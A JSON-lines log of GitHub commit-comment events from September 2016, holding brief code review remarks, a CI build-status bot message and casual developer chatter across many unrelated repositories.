{"id":"4631155437","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19208516,"position":null,"line":null,"path":null,"commit_id":"e5ab0940f7fc1ced4c80848c91ee0b356ce8afee","created_at":"2016-09-28T14:46:33Z","updated_at":"2016-09-28T14:46:33Z","body":"license-update (macumber) - Win64-Windows-7-VisualStudio-12: OK (2411 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.49%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T14:46:33Z"}
{"id":"4631155613","type":"CommitCommentEvent","actor":{"login":"cjpicc11"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208517,"position":null,"line":null,"path":null,"commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:46:35Z","updated_at":"2016-09-28T14:46:35Z","body":"Wow, thanks for all your feedback @Lilyheart .  Very much appreciated!  I need to learn how to use Git for pulling out what you just updated or committing.  Do you know of a good reference to start learning from?"}},"created_at":"2016-09-28T14:46:35Z"}
{"id":"4631155879","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19208519,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T14:46:36Z","updated_at":"2016-09-28T14:46:36Z","body":"@irond13 thanks- we're looking into a non-breaking way to accomplish this and will follow up asap."}},"created_at":"2016-09-28T14:46:36Z"}
{"id":"4631161341","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208528,"position":26,"line":29,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:47:24Z","updated_at":"2016-09-28T14:47:24Z","body":"The lines\r\n``` css\r\n   position: relative;\r\n    display: block;\r\n    text-align: left;\r\n```\r\nI don't think are really accomplishing anything here.  They might just be left over code from something else you were trying.  Having them in there isn't an issue, but it might cause some problems if it's just left over code if you decided to change something later."}},"created_at":"2016-09-28T14:47:24Z"}
{"id":"4631169224","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19208538,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T14:48:34Z","updated_at":"2016-09-28T14:48:34Z","body":"and we'll still do it using our framework:\r\nhttp://www.yiiframework.com/wiki/165/understanding-autoloading-helper-classes-and-helper-functions/"}},"created_at":"2016-09-28T14:48:34Z"}
{"id":"4631171005","type":"CommitCommentEvent","actor":{"login":"qiancai"},"repo":{"name":"aveshagarwal/etcd-container"},"payload":{"comment":{"id":19208546,"position":null,"line":null,"path":null,"commit_id":"0e08f11c30690e0ecbc7125f62af3d00cb65a38d","created_at":"2016-09-28T14:48:49Z","updated_at":"2016-09-28T14:48:49Z","body":"LGTM"}},"created_at":"2016-09-28T14:48:49Z"}
{"id":"4631171014","type":"CommitCommentEvent","actor":{"login":"franknarf8"},"repo":{"name":"WoltersKluwerCanada/proget-universal-bower-client"},"payload":{"comment":{"id":19208547,"position":null,"line":null,"path":null,"commit_id":"ab3a81f8e9a3af5aacc3d6163faa43108aa1ff38","created_at":"2016-09-28T14:48:49Z","updated_at":"2016-09-28T14:48:49Z","body":"And I disagree back, please re-revert the commit; As discussed irl this morning."}},"created_at":"2016-09-28T14:48:49Z"}
{"id":"4631174209","type":"CommitCommentEvent","actor":{"login":"jde"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208556,"position":92,"line":92,"path":"internal/sponge/sponge.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:49:17Z","updated_at":"2016-09-28T14:49:17Z","body":"This may be too specific and possibly just aesthetics of symmetry, but it seems to me that we should remove the graph quads before removing the item. In the small chance that one operation completes and the other does not, it would be better to have an orphaned item than quads that refer to an item that doesn't exist. \r\n\r\n"}},"created_at":"2016-09-28T14:49:17Z"}
{"id":"4631176174","type":"CommitCommentEvent","actor":{"login":"Toflar"},"repo":{"name":"composer/composer"},"payload":{"comment":{"id":19208567,"position":null,"line":null,"path":null,"commit_id":"15d572da4c2488acc6956dcaa76157da0781f03a","created_at":"2016-09-28T14:49:36Z","updated_at":"2016-09-28T14:49:36Z","body":"@naderman This might be a stupid question but as far as I could see from the code, literals are always to integers. Correct me if I'm wrong. Why do we need to hash here at all? Shouldn't a simple ` return implode(',', $this->literals);` here do the trick? They are already sorted in `__construct()` and should thus be unique so we don't need any rather expensive calls on `unpack`?\r\n"}},"created_at":"2016-09-28T14:49:36Z"}
{"id":"4631181816","type":"CommitCommentEvent","actor":{"login":"connortechnology"},"repo":{"name":"ZoneMinder/ZoneMinder"},"payload":{"comment":{"id":19208577,"position":null,"line":null,"path":null,"commit_id":"350352d9566b1ffb6cca71751aa3f4999f8ceb2e","created_at":"2016-09-28T14:50:23Z","updated_at":"2016-09-28T14:50:23Z","body":"I'm not entirely sure this was a good fix.  I have cameras here doing single image grabs that now loop infinitely.  "}},"created_at":"2016-09-28T14:50:23Z"}
{"id":"4631184236","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19208580,"position":51,"line":81,"path":"nuxeo-features/nuxeo-automation/nuxeo-automation-core/src/test/java/org/nuxeo/ecm/automation/core/operations/blob/BlobToFileTest.java","commit_id":"9a4a6d43b87b762567a0c4498978b07151d64ccd","created_at":"2016-09-28T14:50:42Z","updated_at":"2016-09-28T14:50:42Z","body":"This should work but `new File(tempDirectory.getAbsolutePath(), PDF_NAME)` is preferable (think Windows)."}},"created_at":"2016-09-28T14:50:42Z"}
{"id":"4631185647","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208590,"position":null,"line":null,"path":null,"commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:50:54Z","updated_at":"2016-09-28T14:50:54Z","body":"@cjpicc11 Because you are mostly working in CodePen, it will probably be easier to just go to the main code page and copy/paste the code back into your pen.\r\nhttps://github.com/MontCode/code_review/tree/master/piccini_c/tribute\r\n\r\nFCC does have a page about using git but honestly it's a bit dated.\r\nhttps://www.freecodecamp.com/challenges/save-your-code-revisions-forever-with-git\r\n\r\nUdacity has a great free course on GitHub.\r\nhttps://www.udacity.com/course/how-to-use-git-and-github--ud775"}},"created_at":"2016-09-28T14:50:54Z"}
{"id":"4631188421","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19208599,"position":null,"line":null,"path":null,"commit_id":"d01ca9af9d4c73dbb16d8887d1d8313ed05eab1e","created_at":"2016-09-28T14:51:18Z","updated_at":"2016-09-28T14:51:18Z","body":"Agora sim 👍 "}},"created_at":"2016-09-28T14:51:18Z"}
{"id":"4631190133","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208604,"position":null,"line":null,"path":null,"commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T14:51:32Z","updated_at":"2016-09-28T14:51:32Z","body":"/cc @kitsunenosaraT \r\n\r\nLean Data ho provato a tradurlo con `Big Data meno invasivi`, non fosse altro che per il fatto che, Big Data è un termine usato anche in italiano.\r\nhttps://www.theguardian.com/media-network/media-network-blog/2013/apr/16/big-data-lean-strategy-business\r\n\r\nperò forse sarebbe meglio usare Lean Data?\r\n"}},"created_at":"2016-09-28T14:51:32Z"}
{"id":"4631191103","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19208608,"position":null,"line":null,"path":null,"commit_id":"d7a9eeb64ff8f2388acb975968b32e2c3735dde2","created_at":"2016-09-28T14:51:41Z","updated_at":"2016-09-28T14:51:41Z","body":"`floor` is not an overloaded function, it's a simple function that takes a `double` parameter and returns a `double` result.  If you supply a `float` argument, it will be implicitly promoted.  The error appears if you have `-Wnarrowing` or similar enabled and initialise a `float` with the `double` returned by `floor` without an explicit cast, as you're doing when initialising `quaddims`.  As to why it doesn't break with all configurations, your guess is as good as mine.  But the error is legitimate, there's a loss of range/precision there."}},"created_at":"2016-09-28T14:51:41Z"}
{"id":"4631191721","type":"CommitCommentEvent","actor":{"login":"vbashkirtsev"},"repo":{"name":"gengo/gengo-php"},"payload":{"comment":{"id":19208610,"position":13,"line":9,"path":"src/API.php","commit_id":"3473e54c070999fab48aa92b1bd3345e86ed8ee9","created_at":"2016-09-28T14:51:47Z","updated_at":"2016-09-28T14:51:47Z","body":"@hayate: Are you aware that dropping backslash in use statement actually changes the meaning? With backslash it refers to global Exception class only. Without it refers to Gengo\\Exception class because of namespace declared just above. Only if Gengo\\Exception does not exist then PHP falls back onto global Exception. Without backslash PHP compiler spends more time on class name resolution and it introduces potential issue if Gengo\\Exception class is introduced."}},"created_at":"2016-09-28T14:51:47Z"}
{"id":"4631193871","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19208613,"position":4,"line":11,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"308c880f2a8860c18d409939155ebaaf62560fcb","created_at":"2016-09-28T14:52:05Z","updated_at":"2016-09-28T14:52:05Z","body":"Cliente não pediu isto. Elfo nasce com 0 de experiência."}},"created_at":"2016-09-28T14:52:05Z"}
{"id":"4631194375","type":"CommitCommentEvent","actor":{"login":"MwMaki"},"repo":{"name":"MwMaki/hw6"},"payload":{"comment":{"id":19208615,"position":null,"line":null,"path":null,"commit_id":"df0990f8e913737a59d8f4dc6967c74e9f95ef41","created_at":"2016-09-28T14:52:09Z","updated_at":"2016-09-28T14:52:09Z","body":"It's documents because there is pictures inside it.\nAnd its rar because too many files so i thought it's better to put them in\none file.\n\nI'll change them as soon as I'm home\n\nOn Sep 28, 2016 9:29 AM, \"Samer Sharba\" <notifications@github.com> wrote:\n\n> also whey .rar?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MwMaki/hw6/commit/df0990f8e913737a59d8f4dc6967c74e9f95ef41#commitcomment-19208146>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVBabbcXhauSYwavuGwUXJMg4-bDpIzIks5qunm-gaJpZM4KI5JF>\n> .\n>\n"}},"created_at":"2016-09-28T14:52:09Z"}
{"id":"4631197521","type":"CommitCommentEvent","actor":{"login":"moeller0"},"repo":{"name":"dtaht/tc-adv"},"payload":{"comment":{"id":19208627,"position":null,"line":null,"path":null,"commit_id":"2c7ddd720a85f1814b9099945f6981e4ab8b8105","created_at":"2016-09-28T14:52:35Z","updated_at":"2016-09-28T14:52:35Z","body":"Hi Jonathan,\n\n\n> On Sep 28, 2016, at 15:57 , chromi <notifications@github.com> wrote:\n> \n> \n> > On 28 Sep, 2016, at 12:14, moeller0 <notifications@github.com> wrote:\n> > \n> > This seems rather unexpected, for ATM/PTM the same is achieved by using the via-ethernet keyword, why treat DOCSIS any different? \n> \n> Because there’s a 50/50 chance that an ADSL/VDSL2 interface is “IP type” rather than “Ethernet type” depending on the variety of hardware; I’ve specified all of those options in terms of the underlying IP packet for consistency. OpenWRT and LEDE are capable of running directly on many DSL modems.\n> \n> By contrast, I’m so far unaware of *any* cable modem which is not accessed via an Ethernet-type interface, or on which custom firmware can be loaded. Having to state that explicitly seemed just too verbose, and most users would likely get it wrong unless the distinction was pointed out very explicitly. “But I have a cable modem, and this is the option for cable modems - right?”\n\n\tExcept mow you introduced a special case and a user will be confuzed because things are different between XDSL and DOCSIS, consistency and predictability goes a long way in user interface design IMHO.\n\n\n> \n> On the upside, this time I *am* writing documentation. It’s taking a while.\n\n\tExcellent, I will refrain from further barking up that tree.\n\n> \n> I suppose the ideal would be for Cake to check whether it’s running on an IP or Ethernet interface, and make the correction automatically. I need more coffee before I can figure that out.\n\n\tAs long as one of the options allows to bypass this auto-detection that would be probably user-friendly. The explicit numeric “overhead NN” option comes to mind as the “kernel, please do exactly as I ask” option…\n\n\tSebastian\n\n> \n> - Jonathan Morton\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-28T14:52:35Z"}
{"id":"4631197609","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"CristianCarvalho/EDL"},"payload":{"comment":{"id":19208628,"position":null,"line":null,"path":null,"commit_id":"0b1bff25fae987029627a0018119e04f3dc53aab","created_at":"2016-09-28T14:52:35Z","updated_at":"2016-09-28T14:52:35Z","body":"São 6 propriedades (2x3)"}},"created_at":"2016-09-28T14:52:35Z"}
{"id":"4631198085","type":"CommitCommentEvent","actor":{"login":"DeerTrodis"},"repo":{"name":"DeerTrodis/helloworld"},"payload":{"comment":{"id":19208629,"position":4,"line":4,"path":"README.md","commit_id":"8c9145e21ee47bc0142ff27632dfceec87ea79e2","created_at":"2016-09-28T14:52:40Z","updated_at":"2016-09-28T14:52:40Z","body":"hhhh "}},"created_at":"2016-09-28T14:52:40Z"}
{"id":"4631198140","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19208630,"position":7,"line":7,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"a70c2bfa89f1beb7a9963754b371517c9524d823","created_at":"2016-09-28T14:52:40Z","updated_at":"2016-09-28T14:52:40Z","body":"Continua desnecessário. Cliente não pediu para que `Dwarf` tenha nome."}},"created_at":"2016-09-28T14:52:40Z"}
{"id":"4631198378","type":"CommitCommentEvent","actor":{"login":"SiNaPsEr0x"},"repo":{"name":"deltaxflux/fluxion"},"payload":{"comment":{"id":19208631,"position":null,"line":null,"path":null,"commit_id":"362e1c8c6091acf8edea7ff85e461206ef897f84","created_at":"2016-09-28T14:52:42Z","updated_at":"2016-09-28T14:52:42Z","body":"don't work :( fix pls"}},"created_at":"2016-09-28T14:52:42Z"}
{"id":"4631198740","type":"CommitCommentEvent","actor":{"login":"cky917"},"repo":{"name":"Alexandermclean/mystudy"},"payload":{"comment":{"id":19208634,"position":7,"line":7,"path":"scroll/demo.html","commit_id":"5e8a86657d8d7e519c094f9a735a13b90f7bd939","created_at":"2016-09-28T14:52:46Z","updated_at":"2016-09-28T14:52:46Z","body":"不要用中文路径"}},"created_at":"2016-09-28T14:52:46Z"}
{"id":"4631199570","type":"CommitCommentEvent","actor":{"login":"dwhitena"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208637,"position":6,"line":51,"path":"cmd/sponged/tests/data_test.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:52:53Z","updated_at":"2016-09-28T14:52:53Z","body":"Fixed here https://github.com/coralproject/shelf/commit/e043a8a562595b15d256e9f75531d72ccf664e9b"}},"created_at":"2016-09-28T14:52:53Z"}
{"id":"4631200356","type":"CommitCommentEvent","actor":{"login":"dwhitena"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208640,"position":29,"line":29,"path":"internal/sponge/sponge.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:53:00Z","updated_at":"2016-09-28T14:53:00Z","body":"Fixed here https://github.com/coralproject/shelf/commit/e043a8a562595b15d256e9f75531d72ccf664e9b"}},"created_at":"2016-09-28T14:53:00Z"}
{"id":"4631200712","type":"CommitCommentEvent","actor":{"login":"dwhitena"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208643,"position":47,"line":47,"path":"internal/sponge/sponge.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:53:04Z","updated_at":"2016-09-28T14:53:04Z","body":"Fixed here https://github.com/coralproject/shelf/commit/e043a8a562595b15d256e9f75531d72ccf664e9b"}},"created_at":"2016-09-28T14:53:04Z"}
{"id":"4631204115","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19208649,"position":21,"line":21,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"a70c2bfa89f1beb7a9963754b371517c9524d823","created_at":"2016-09-28T14:53:33Z","updated_at":"2016-09-28T14:53:33Z","body":"Se recebermos por parâmetro a quantidade de vida a ser perdida estaremos permitindo que agentes externos ao Dwarf controlem isto. O cliente quer que sempre que o Dwarf receber uma flechada perca 10 de vida."}},"created_at":"2016-09-28T14:53:33Z"}
{"id":"4631206391","type":"CommitCommentEvent","actor":{"login":"Tyriar"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19208654,"position":12,"line":2668,"path":"src/vs/vscode.d.ts","commit_id":"14ea3c491d4029c19f1af2ff30e8dff3bf4ebb79","created_at":"2016-09-28T14:53:52Z","updated_at":"2016-09-28T14:53:52Z","body":"FYI @jrieken "}},"created_at":"2016-09-28T14:53:52Z"}
{"id":"4631207249","type":"CommitCommentEvent","actor":{"login":"jde"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208657,"position":6,"line":74,"path":"cmd/sponged/routes/routes.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:54:02Z","updated_at":"2016-09-28T14:54:02Z","body":"We need to settle on POST vs PUT for these endpoints. They can't be inconsistent. \r\n\r\nI would expose both. The upsert operation covers two of the CRUD operations (create and update). API semantics is very clear that Creates should be POST and Update should be PUT. Many frontends are hard wired to use these verbs.  I recommend we expose both for all upserts."}},"created_at":"2016-09-28T14:54:02Z"}
{"id":"4631209101","type":"CommitCommentEvent","actor":{"login":"dcs619"},"repo":{"name":"NewSpring/Rock"},"payload":{"comment":{"id":19208662,"position":612,"line":2653,"path":"RockWeb/Blocks/Finance/TransactionEntry.ascx.cs","commit_id":"6bbd5dc5f942bbeaf87ef8de51b00b6c65114460","created_at":"2016-09-28T14:54:16Z","updated_at":"2016-09-28T14:54:16Z","body":"@azturner This change would fix #1583, but was it intentional?"}},"created_at":"2016-09-28T14:54:16Z"}
{"id":"4631209302","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19208663,"position":21,"line":21,"path":"demo/demo.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-28T14:54:18Z","updated_at":"2016-09-28T14:54:18Z","body":"Commented code should be removed prior to release."}},"created_at":"2016-09-28T14:54:18Z"}
{"id":"4631209419","type":"CommitCommentEvent","actor":{"login":"ssharba"},"repo":{"name":"MwMaki/hw6"},"payload":{"comment":{"id":19208664,"position":null,"line":null,"path":null,"commit_id":"df0990f8e913737a59d8f4dc6967c74e9f95ef41","created_at":"2016-09-28T14:54:19Z","updated_at":"2016-09-28T14:54:19Z","body":"replace .rar with folder and put everything inside. find another way to present .docx . I want to be able to read your homework on GitHub and put commits."}},"created_at":"2016-09-28T14:54:19Z"}
{"id":"4631209734","type":"CommitCommentEvent","actor":{"login":"irond13"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19208665,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T14:54:21Z","updated_at":"2016-09-28T14:54:21Z","body":"@mikermcneil thanks! it's not a major adjustment from the user perspective, but it is quite unexpected and took a while to track down in our case."}},"created_at":"2016-09-28T14:54:21Z"}
{"id":"4631211614","type":"CommitCommentEvent","actor":{"login":"pjmolina"},"repo":{"name":"pjmolina/app1"},"payload":{"comment":{"id":19208670,"position":1,"line":1,"path":"Cristian.txt","commit_id":"651b5817031a4a010ce7bbfb4214b29ae12c61f4","created_at":"2016-09-28T14:54:38Z","updated_at":"2016-09-28T14:54:38Z","body":"Esto es un comentario"}},"created_at":"2016-09-28T14:54:38Z"}
{"id":"4631212288","type":"CommitCommentEvent","actor":{"login":"RodrigoScheuer"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19208672,"position":12,"line":12,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"43b14b6d069ecc777e94867ce2e610e14e4f44d7","created_at":"2016-09-28T14:54:43Z","updated_at":"2016-09-28T14:54:43Z","body":"certo, vdd"}},"created_at":"2016-09-28T14:54:43Z"}
{"id":"4631212586","type":"CommitCommentEvent","actor":{"login":"EllaineGabotero"},"repo":{"name":"carsim101/rfid_project"},"payload":{"comment":{"id":19208675,"position":null,"line":null,"path":null,"commit_id":"156791fb39ee841f0c3731793b52e6a09716ad59","created_at":"2016-09-28T14:54:47Z","updated_at":"2016-09-28T14:54:47Z","body":"wala pakoy bag hahaha unya na hahahha"}},"created_at":"2016-09-28T14:54:47Z"}
{"id":"4631214134","type":"CommitCommentEvent","actor":{"login":"dwhitena"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208680,"position":92,"line":92,"path":"internal/sponge/sponge.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:55:00Z","updated_at":"2016-09-28T14:55:00Z","body":"Fixed here https://github.com/coralproject/shelf/commit/6331f6d7d44919267307d2c5c226c504504af113"}},"created_at":"2016-09-28T14:55:00Z"}
{"id":"4631216938","type":"CommitCommentEvent","actor":{"login":"Polina97"},"repo":{"name":"Polina97/SenlaJavaTraningKurbatovaPolina"},"payload":{"comment":{"id":19208687,"position":null,"line":null,"path":null,"commit_id":"cb98f275ba8536e70d7c89f70ea56243db3c4814","created_at":"2016-09-28T14:55:24Z","updated_at":"2016-09-28T14:55:24Z","body":"Delete old text file."}},"created_at":"2016-09-28T14:55:24Z"}
{"id":"4631218470","type":"CommitCommentEvent","actor":{"login":"nycdavid"},"repo":{"name":"nycdavid/Everkan"},"payload":{"comment":{"id":19208692,"position":null,"line":null,"path":null,"commit_id":"6f1db5c3b34fe13324879423ff1da15c1782750a","created_at":"2016-09-28T14:55:36Z","updated_at":"2016-09-28T14:55:36Z","body":"Ha! @AdamT No wonder this commit fixed everything... 😛 "}},"created_at":"2016-09-28T14:55:36Z"}
{"id":"4631219954","type":"CommitCommentEvent","actor":{"login":"dwhitena"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208695,"position":null,"line":null,"path":null,"commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:55:47Z","updated_at":"2016-09-28T14:55:47Z","body":"Yes @jde This became increasingly apparent.  Especially when we were getting inconsistencies in the data import process and we want to reuse this functionality elsewhere."}},"created_at":"2016-09-28T14:55:47Z"}
{"id":"4631221494","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19208700,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T14:56:01Z","updated_at":"2016-09-28T14:56:01Z","body":"Did you even read that? It recommends using neither classes nor namespaces for helper functions. I think a class with static functions is to prefer than a namespace filled with functions, since classes can have private functions. Even worse is of course using neither (except in very rare cases)."}},"created_at":"2016-09-28T14:56:01Z"}
{"id":"4631221554","type":"CommitCommentEvent","actor":{"login":"agrignard"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":19208701,"position":null,"line":null,"path":null,"commit_id":"9f9ced4b53bb2269ce8e8c3687959aed7409e378","created_at":"2016-09-28T14:56:01Z","updated_at":"2016-09-28T14:56:01Z","body":"Stiil got this error\r\n\r\nError compiling the vertex shader: ERROR: 0:32: Incompatible types (vec2 and vec3) in assignment (and no available implicit conversion)"}},"created_at":"2016-09-28T14:56:01Z"}
{"id":"4631222500","type":"CommitCommentEvent","actor":{"login":"stijnvanhoey"},"repo":{"name":"inbo/inbo-pyutils"},"payload":{"comment":{"id":19208703,"position":null,"line":null,"path":null,"commit_id":"0c4ae7b291868b32fe9936692b3d5f33a736bebf","created_at":"2016-09-28T14:56:10Z","updated_at":"2016-09-28T14:56:10Z","body":"For the moment, I'll make a patch that makes the output file creation obsolete. I would keep the patch of the delimiter as it provides the necessary information in case an output file is required (independent from the input handling).\r\nAs we will probably re-use this kind of 'design-pattern' (input can be either a dataframe or a text-file with a certain delimiter, which can be different from tab or ,), I'll create a new issue to implemente a more general decorator we can reuse in this type of functions.\r\n\r\n"}},"created_at":"2016-09-28T14:56:10Z"}
{"id":"4631222894","type":"CommitCommentEvent","actor":{"login":"tista500"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19208704,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T14:56:13Z","updated_at":"2016-09-28T14:56:13Z","body":"> > .default-decoration should not be ignored in metacity, is it?\r\n> Hopefully right. Adwaita stopped adding window-manager specific theming already though, but we need.\r\n\r\nI'm sorry I was wrong. `.default-decoration` works as we expected as to be set `headerbar.titlebar.default-decoration`. So the problem might be Adapta specific... :(\r\n\r\nRegards."}},"created_at":"2016-09-28T14:56:13Z"}
{"id":"4631224707","type":"CommitCommentEvent","actor":{"login":"jsmeix"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":19208709,"position":null,"line":null,"path":null,"commit_id":"847323fbedefda7376530bd2e3e13cae87fa9b38","created_at":"2016-09-28T14:56:27Z","updated_at":"2016-09-28T14:56:27Z","body":"@philippebolduc \r\nyou did it right.\r\n\r\nFurther comments should go to\r\nhttps://github.com/rear/rear/issues/1014\r\nand\r\nhttps://github.com/rear/rear/pull/1017\r\n"}},"created_at":"2016-09-28T14:56:27Z"}
{"id":"4631225156","type":"CommitCommentEvent","actor":{"login":"clementFoyer"},"repo":{"name":"bosilca/ompi"},"payload":{"comment":{"id":19208711,"position":151,"line":286,"path":"ompi/mca/pml/monitoring/pml_monitoring_component.c","commit_id":"3f0bacdfaa2bf52a67a448972a43d0a330df0ed5","created_at":"2016-09-28T14:56:30Z","updated_at":"2016-09-28T14:56:30Z","body":"Is it normal that we call strdup on a variable, and we store the result in the variable itself?"}},"created_at":"2016-09-28T14:56:30Z"}
{"id":"4631226322","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19208715,"position":null,"line":null,"path":null,"commit_id":"811205ed1f23b973fefae30a82267152da788390","created_at":"2016-09-28T14:56:40Z","updated_at":"2016-09-28T14:56:40Z","body":"Pq o código está em um txt? Só revisarei código java.\r\n\r\nE cuida a indentação também, pra ficar legível."}},"created_at":"2016-09-28T14:56:40Z"}
{"id":"4631227642","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"felipedibe/EDL"},"payload":{"comment":{"id":19208717,"position":null,"line":null,"path":null,"commit_id":"e18020e914dd8b4bbd7faaa908c0800a3c0d24ee","created_at":"2016-09-28T14:56:51Z","updated_at":"2016-09-28T14:56:51Z","body":"O código é pra ser extensão `.lua`"}},"created_at":"2016-09-28T14:56:51Z"}
{"id":"4631228843","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208719,"position":132,"line":36,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:57:01Z","updated_at":"2016-09-28T14:57:01Z","body":"You'll see I closed the `ul` above this, put the `h3` outside the `ul` and reopened the bullets again after the h3."}},"created_at":"2016-09-28T14:57:01Z"}
{"id":"4631231339","type":"CommitCommentEvent","actor":{"login":"RodrigoScheuer"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19208724,"position":22,"line":39,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"43b14b6d069ecc777e94867ce2e610e14e4f44d7","created_at":"2016-09-28T14:57:22Z","updated_at":"2016-09-28T14:57:22Z","body":"bom fiz ele perder vida so na classe de teste, pq se naum teria q herdar a classe Dwarves pra usar o metodo, ou usar metodo static."}},"created_at":"2016-09-28T14:57:22Z"}
{"id":"4631234932","type":"CommitCommentEvent","actor":{"login":"RodrigoScheuer"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19208738,"position":74,"line":71,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"43b14b6d069ecc777e94867ce2e610e14e4f44d7","created_at":"2016-09-28T14:57:52Z","updated_at":"2016-09-28T14:57:52Z","body":"ok"}},"created_at":"2016-09-28T14:57:52Z"}
